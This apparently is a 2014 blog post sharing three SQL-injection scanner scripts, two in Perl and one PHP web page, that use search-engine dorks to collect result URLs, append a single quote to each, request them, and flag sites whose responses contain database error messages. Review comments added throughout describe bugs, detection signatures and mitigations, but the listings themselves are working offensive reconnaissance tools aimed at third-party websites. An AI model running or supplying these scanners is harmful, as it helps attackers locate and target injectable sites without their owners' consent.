Thứ Sáu, 7 tháng 2, 2014

PERL DORK SCANNER

#!/usr/bin/perl
# .:. .:. .:. .:. .:. .:. .:. .:. .:. .:. .:. .:.
# .:. Script : SQLi Vulnerable Scanner .:.
# .:. Version : 3.0 fixed (06/10/2012) .:.
# .:. Author : Metropolis .:.
# .:. Home : https://www1.r00tw0rm.com/ .:.
# .:. .:. .:. .:. .:. .:. .:. .:. .:. .:. .:. .:.
# .:. MySQL Injection .:.
# .:. MSAccess Injection .:.
# .:. MSSQL Injection .:.
# .:. Oracle Injection .:.
# .:. Blind Injection .:.
# .:. .:. .:. .:. .:. .:. .:. .:. .:. .:. .:. .:.
# Useless version :
# http://pastebin.com/kKxCCJuU 1.0
# http://pastebin.com/FyPcTLRw 2.0
use LWP::UserAgent;
use Getopt::Std;
# Review note (defensive reading). This is a flat script with no subs. It
# requests successive search-result pages for the -k term, appends a single
# quote to each link it extracts, fetches that URL, and prints the link when the
# response body contains one of the database error strings matched below.
# A hit only means the response contained that text; nothing is confirmed.
# There is no `use strict` / `use warnings`, so every variable is a package
# global. -o is accepted by getopt but never read in the visible code.
getopt('kpo', \%opts);
# NOTE(review): a missing -k only prints the usage line; execution continues
# and the search loop below still runs with an empty term.
if($opts{'k'} eq '')
{
print "[Help] SQLi.pl -k shopping.php?id= -p 500\n"; # Max: 50,100,500,700,etc...
}
# -p is the number of result pages to walk; it defaults to 1.
if($opts{'p'} eq '')
{
$opts{'p'} = 1;
}
# Banner only; the heredoc body is printed verbatim.
print <<"Metropolis_intro";
___________
|.---------.|
|| ||
|| scanner ||
|| ||
|'---------'|
`)__ ____('
[=== -- o ]--.
__'---------'__ \
[::::::::::: :::] )
`""'"""""'""""`/T\\
\\_/
Metropolis_intro
# Shells out to `COLOR A`; presumably the Windows console colour command, so on
# other platforms this is just a failed command whose status is ignored.
system('COLOR A');
print "\n\n[Script] SQLi Vulnerable Scanner (MySQL,MSAccess,MSSQL,Oracle,Blind)\n";
print "[Author] Metropolis\n\n\n\n";
# One iteration per result page, 10 results each. The loop stops only when
# $start equals -p * 10 exactly, so a negative or non-integer -p never ends.
for($start = 0;$start != $opts{'p'}*10;$start += 10)
{
# The -k value is concatenated into the query string without URL-encoding.
$t = "http://www.google.fr/search?hl=fr&q=".$opts{'k'}."&btnG=Search&start=".
$start;
$ua = LWP::UserAgent->new;
$ua->timeout(10);
$ua->env_proxy;
# The browser-like agent string applies to the search request only. The literal
# spans two source lines, so the value contains an embedded newline.
$ua->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; tr; rv:1.9.2.12)
Gecko/20101026 Firefox/3.6.12 ( .NET CLR 3.5.30729; .NET4.0E");
$response = $ua->get($t);
if ($response->is_success)
{
$c = $response->content;
# Crude HTML scraping: split on anchor tags and keep fragments followed by
# ` class=l`. This depends entirely on the result page's markup.
@stuff = split(/<a href=/,$c);
foreach $line(@stuff)
{
if($line =~/(.*) class=l/ig)
{
$out = $1;
# Strip double quotes, then append a single quote to the end of the URL.
$out =~ s/"//g;
$out =~s/$/\'/;
# Detection note: a fresh UserAgent is built here and ->agent is not called on
# it, so these requests carry LWP's default agent string
# (libwww-perl/<version>). A URL ending in a single quote plus that agent is a
# straightforward signature for access-log review or a WAF rule.
$ua = LWP::UserAgent->new;
$ua->timeout(10);
$ua->env_proxy;
# $response is overwritten and its body is read without checking the status,
# so HTTP error pages are inspected as well.
$response = $ua->get($out);
$error = $response->content();
# Everything below keys on verbose database/driver error text in the response.
# Mitigation for site owners: parameterised queries remove the flaw itself;
# generic error pages (no driver messages sent to clients) remove this signal.
if($error =~m/SQL syntax/)
{print "$out Vulnerable MySQL!\n";}
elsif($error =~m/Microsoft JET Database/ || $error =~m/ODBC Microsoft
Access Driver/)
{print "$out Vulnerable MS Access!\n";}
elsif($error =~m/Microsoft OLE DB Provider for SQL Server/ || $error
=~m/Unclosed quotation mark/)
{print "$out Vulnerable MSSQL!\n";}
# The `()` in these patterns is an empty capture group, not a literal pair of
# parentheses, so they match the bare function names. The "Blind" label is
# therefore printed for any response that mentions those PHP functions.
elsif($error =~m/mysql_fetch_array()/ || $error =~m/mysql_num_rows()/)
{print "$out Vulnerable Blind Possible!\n";}
elsif($error =~m/Microsoft OLE DB Provider for Oracle/)
{print "$out Vulnerable Oracle!\n";}
}
}
}
}

perl2

  1. #!/usr/bin/perl
  2.    use LWP::Simple;
  3.    use LWP::UserAgent;
  4.    use HTTP::Request;
  # Review note (defensive reading). Interactive variant of the same idea: it
  # prompts for a search term and a page count, walks the result pages, appends
  # a single quote to each extracted link, fetches it, and prints the link when
  # the body contains one of the error strings below. Output says "Could be",
  # and the first pattern set is broad enough that it is only a weak hint.
  # Only $sis, $dork and $page are lexical; the rest are package globals and
  # there is no `use strict` / `use warnings` in the listing.
  5.    my $sis="$^O";if ($sis eq 'MSWin32') { system("cls"); } else { system("clear"); }
  6.    print "+++++++++++++++++++++++++++++++\n";
  7.    print "+     SQL - Google Search     +\n";
  8.    print "+       CWH Underground       +\n";
  9.    print "+++++++++++++++++++++++++++++++\n\n";
  10.    print "Insert Dork:";
  11.    chomp( my $dork = <STDIN> );
  12.    print "Total Query Pages (10 Links/Pages) :";
  13.    chomp( my $page = <STDIN> );
  14.    print "\n
  15.     * Result:\n\n";
  # The loop stops only when $start equals $page * 10 exactly; a negative or
  # non-integer page count never terminates.
  16.    for($start = 0;$start != $page*10;$start += 10)
  17.    {  
  # $dork is concatenated into the query string without URL-encoding.
  18.    $t = "http://www.google.com/search?hl=en&q=".$dork."&btnG=Search&start=".$start;
  19.        $ua = LWP::UserAgent->new(agent => 'Mozilla 5.2');
  20.        $ua->timeout(10);
  21.        $ua->env_proxy;
  22.        $response = $ua->get($t);
  23.        if ($response->is_success)
  24.        {
  25.            $c = $response->content;
  # Scrapes links by splitting on anchor tags and keeping fragments followed by
  # ` class=l`; this depends entirely on the result page's markup.
  26.            @stuff = split(/<a href=/,$c);
  27.            foreach $line(@stuff)
  28.            {
  29.                if($line =~/(.*) class=l/ig)
  30.                {
  31.                    $out = $1;
  # Strip double quotes, then append a single quote to the end of the URL.
  32.                    $out =~ s/\"//g;
  33.          $out =~s/$/\'/;  
  # Detection note: the probe uses the same fixed agent string as the search
  # request ('Mozilla 5.2'). That constant, together with a URL ending in a
  # single quote, is a simple signature for access-log review or a WAF rule.
  34.          $ua = LWP::UserAgent->new(agent => 'Mozilla 5.2');
  35.          $ua->timeout(10);
  36.          $ua->env_proxy;
  # The body is read without checking the status, so error pages are inspected.
  37.          $response = $ua->get($out);
  38.          $error = $response->content();
  # `Warning:`, `mysql_` and `Division by zero in` match ordinary PHP warnings
  # and plain page text, so the "MySQL" label has a high false-positive rate.
  # Mitigation for site owners: parameterised queries remove the flaw itself;
  # not sending interpreter or driver errors to clients removes this signal.
  39.          if($error =~m/mysql_/ || $error =~m/Division by zero in/ || $error =~m/Warning:/)
  40.             {print "$out => Could be Vulnerable in MySQL Injection!!\n";}
  41.          elsif($error =~m/Microsoft JET Database/ || $error =~m/ODBC Microsoft Access Driver/)
  42.             {print "$out => Could be Vulnerable in MS Access Injection!!\n";}
  43.          elsif($error =~m/Microsoft OLE DB Provider for SQL Server/ || $error =~m/Unclosed quotation mark/)
  44.             {print "$out => Could be Vulnerable in MSSQL Injection!!\n";}
  45.          elsif($error =~m/Microsoft OLE DB Provider for Oracle/)
  46.             {print "$out => Could be Vulnerable in Oracle Injection!!\n";}
  47.           }
  48.       }
  49.        }
  50.         }


php

  1. <php
  2. <html>
  3. <head>
  4. <title>m0bil3_xT's SQLi Scanner</title>
  5. <center><img src="http://i.imgur.com/lH3GO.png">
  6. </center>
  7. </head>
  8. <body bgcolor=#000000>
  9. <style>
  10. body{
  11. font: 10pt Verdana;
  12. }
  13. tr {
  14. BORDER-RIGHT: #3e3e3e 1px solid;
  15. BORDER-TOP: #3e3e3e 1px solid;
  16. BORDER-LEFT: #3e3e3e 1px solid;
  17. BORDER-BOTTOM: #3e3e3e 1px solid;
  18. color: #ff9900;
  19. }
  20. td {
  21. BORDER-RIGHT: #3e3e3e 1px solid;
  22. BORDER-TOP: #3e3e3e 1px solid;
  23. BORDER-LEFT: #3e3e3e 1px solid;
  24. BORDER-BOTTOM: #3e3e3e 1px solid;
  25. color: #2BA8EC;
  26. font: 10pt Verdana;
  27. }
  28. table {
  29. BORDER-RIGHT: #3e3e3e 1px solid;
  30. BORDER-TOP: #3e3e3e 1px solid;
  31. BORDER-LEFT: #3e3e3e 1px solid;
  32. BORDER-BOTTOM: #3e3e3e 1px solid;
  33. BACKGROUND-COLOR: #111;
  34. }
  35. input {
  36. BORDER-RIGHT: #3e3e3e 1px solid;
  37. BORDER-TOP: #3e3e3e 1px solid;
  38. BORDER-LEFT: #3e3e3e 1px solid;
  39. BORDER-BOTTOM: #3e3e3e 1px solid;
  40. BACKGROUND-COLOR: Black;
  41. font: 10pt Verdana;
  42. color: #ff9900;
  43. }
  44. input.submit {
  45. text-shadow: 0pt 0pt 0.3em cyan, 0pt 0pt 0.3em cyan;
  46. color: #FFFFFF;
  47. border-color: #009900;
  48. }
  49. code {
  50. border   : dashed 0px #333;
  51. BACKGROUND-COLOR: Black;
  52. font: 10pt Verdana bold;
  53. color: while;
  54. }
  55. run {
  56. border   : dashed 0px #333;
  57. font: 10pt Verdana bold;
  58. color: #FF00AA;
  59. }
  60. textarea {
  61. BORDER-RIGHT: #3e3e3e 1px solid;
  62. BORDER-TOP: #3e3e3e 1px solid;
  63. BORDER-LEFT: #3e3e3e 1px solid;
  64. BORDER-BOTTOM: #3e3e3e 1px solid;
  65. BACKGROUND-COLOR: #1b1b1b;
  66. font: Fixedsys bold;
  67. color: #aaa;
  68. }
  69. A:link {
  70. COLOR: #2BA8EC; TEXT-DECORATION: none
  71. }
  72. A:visited {
  73. COLOR: #2BA8EC; TEXT-DECORATION: none
  74. }
  75. A:hover {
  76. text-shadow: 0pt 0pt 0.3em cyan, 0pt 0pt 0.3em cyan;
  77. color: #ff9900; TEXT-DECORATION: none
  78. }
  79. A:active {
  80. color: Red; TEXT-DECORATION: none
  81. }
  82. .listdir tr:hover{
  83. background: #444;
  84. }
  85. .listdir tr:hover td{
  86. background: #444;
  87. text-shadow: 0pt 0pt 0.3em cyan, 0pt 0pt 0.3em cyan;
  88. color: #FFFFFF; TEXT-DECORATION: none;
  89. }
  90. .notline{
  91. background: #111;
  92. }
  93. .line{
  94. background: #222;
  95. }
  96. </style>
  97. <center>
  98. <br/>
  99. <?php
  // Review note (defensive reading). This page takes a search term by POST,
  // fetches up to 31 result pages from a third-party search front end, inserts
  // a single quote after every `=` in each scraped link, requests it from the
  // web server's own address, and labels the link by matching error text in
  // the response. No authentication or CSRF check is visible in this listing,
  // so anyone who can reach the page can make the hosting server send these
  // requests.
  100. echo "<font style='text-shadow: 0px 0px 6px rgb(255, 0, 0), 0px 0px 5px rgb(300, 0,
  101. 0), 0px 0px 5px rgb(300, 0, 0); color:#ffffff; font-weight:bold;' size='5'> </font><br><font style='text-shadow: 0px 0px 6px rgb(255, 0, 0), 0px 0px 5px
  102. rgb(300, 0, 0), 0px 0px 5px rgb(300, 0, 0); color:#ffffff; font-weight:bold;'
  103. size='5'></font></b><br><br><center><a href='
  104. target='_blank'></a><br><a</a></center><br></font><center><font style='text-shadow: 0px 0px 6px rgb(255, 0,
  105. 0), 0px 0px 5px rgb(300, 0, 0), 0px 0px 5px rgb(300, 0, 0); color:#ffffff;
  106. font-weight:bold;' size='2'></font><br><br></center>";
  107. $your_ip        = $_SERVER['REMOTE_ADDR'];
  108. echo "<font style='text-shadow:0px 0px 10px #12E12E; font-weight:bold;' color=#FF0000
  109. size='2'>Your IP : </font><font style='text-shadow:0px 0px 10px #12E12E;
  110. font-weight:bold;' color=#FF0000 size='2'>$your_ip</font><br>";
  // NOTE(review): HTTP_HOST comes from the client's Host header, and
  // gethostbyname() returns its input unchanged when resolution fails. The
  // value is then echoed without htmlspecialchars(), so an unresolvable Host
  // value is reflected into the page as raw HTML.
  111. $server_ip = @gethostbyname($_SERVER["HTTP_HOST"]);
  112. echo "<font style='text-shadow:0px 0px 10px #12E12E; font-weight:bold;' color=#FF0000
  113. size='2'>Server IP : </font><font style='text-shadow:0px 0px 10px #12E12E;
  114. font-weight:bold;' color=#FF0000 size='2'>$server_ip </font><br><br>";
  115. echo '<form method="post" action=""><font color="red">Dork :</font> <input type="text"
  116. value="" name="dork" size="20"/><input type="submit" name="scan"
  117. value="Scan"></form></center>';
  118. ob_start();
  // Removes the execution time limit: one POST can keep a worker busy for the
  // whole scan (31 search pages plus one request per scraped link).
  119. set_time_limit(0);
  120. if (isset($_POST['scan'])) {
  // $browser is assigned but never actually used; see the CURLOPT_USERAGENT
  // notes below.
  121. $browser = $_SERVER['HTTP_USER_AGENT'];
  // No scheme is given; presumably curl falls back to http:// here.
  122. $first = "startgoogle.startpagina.nl/index.php?q=";
  123. $sec = "&start=";
  124. $reg = '/<p class="g"><a href="(.*)" target="_self" onclick="/';
  // $id runs 0..30 inclusive, i.e. 31 result pages.
  125. for($id=0 ; $id<=30; $id++){
  126. $page=$id*10;
  127. $dork=urlencode($_POST['dork']);
  128. $url = $first.$dork.$sec.$page;
  129. $curl = curl_init($url);
  130. curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
  // Detection note: the value is single-quoted, so PHP does not interpolate it
  // and the literal text `$browser)` is sent as the User-Agent header.
  131. curl_setopt($curl,CURLOPT_USERAGENT,'$browser)');
  132. $result = curl_exec($curl);
  133. curl_close($curl);
  134. preg_match_all($reg,$result,$matches);
  135. foreach($matches[1] as $site){
  // Inserts a single quote after every `=` in the scraped link.
  136. $url = preg_replace("/=/", "='", $site);
  // NOTE(review): $url comes from remote page content and is requested with no
  // scheme or host restriction, so the hosting server fetches whatever the
  // result page supplies. This handle is never passed to curl_close() in the
  // visible code.
  137. $curl=curl_init();
  138. curl_setopt($curl,CURLOPT_RETURNTRANSFER,1);
  139. curl_setopt($curl,CURLOPT_URL,$url);
  // Same literal `$browser)` agent string as above. Combined with `='` in the
  // query string it is a simple signature for access-log review or a WAF rule.
  140. curl_setopt($curl,CURLOPT_USERAGENT,'$browser)');
  141. curl_setopt($curl,CURLOPT_TIMEOUT,'5');
  142. $GET=curl_exec($curl);
  // The pattern text is line-wrapped on this page and contains a stray
  // `&#8203;` entity, so the alternatives around the breaks will not match what
  // the author presumably intended. `()` is an empty group, not a literal
  // pair of parentheses. `Syntax error` and `Fatal error` match ordinary PHP
  // errors, so "Vuln Found" is a weak hint. Mitigation for site owners:
  // parameterised queries remove the flaw itself; not sending interpreter or
  // driver errors to clients removes this signal.
  143. if (preg_match("/error in your SQL syntax|mysql_fetch_array()|execute
  144. query|mysql_fetch_object()|mysql_num_rows()|mysql_fetch_assoc()|mysql_fetch&#8203;_row
  145. ()|SELECT *
  146. FROM|supplied argument is not a valid MySQL|Syntax error|Fatal error/i",$GET)) {
  // NOTE(review): $url is remote-controlled text written into an href and into
  // the page body without htmlspecialchars($url, ENT_QUOTES). A crafted link in
  // the scraped results becomes markup in the browser of whoever runs the scan.
  // The "Not Vuln" branch below echoes $url unescaped in the same way.
  147. echo '<center><b><font color="#E10000">Found : </font><a href="'.$url.'"
  148. target="_blank">'.$url.'</a><font color=#FF0000> &#60;-- SQLI Vuln
  149. Found..</font></b></center>';
  150. ob_flush();flush();
  151. }else{
  152. echo '<center><font color="#FFFFFF"><b>'.$url.'</b></font><font color="#0FFF16">
  153. &#60;-- Not Vuln</font></center>';
  154. ob_flush();flush();
  155. }
  156. ob_flush();flush();
  157. }
  158. ob_flush();flush();
  159. }
  160. ob_flush();flush();
  161. }
  162. ?>
  163. </body>
  164. </html>
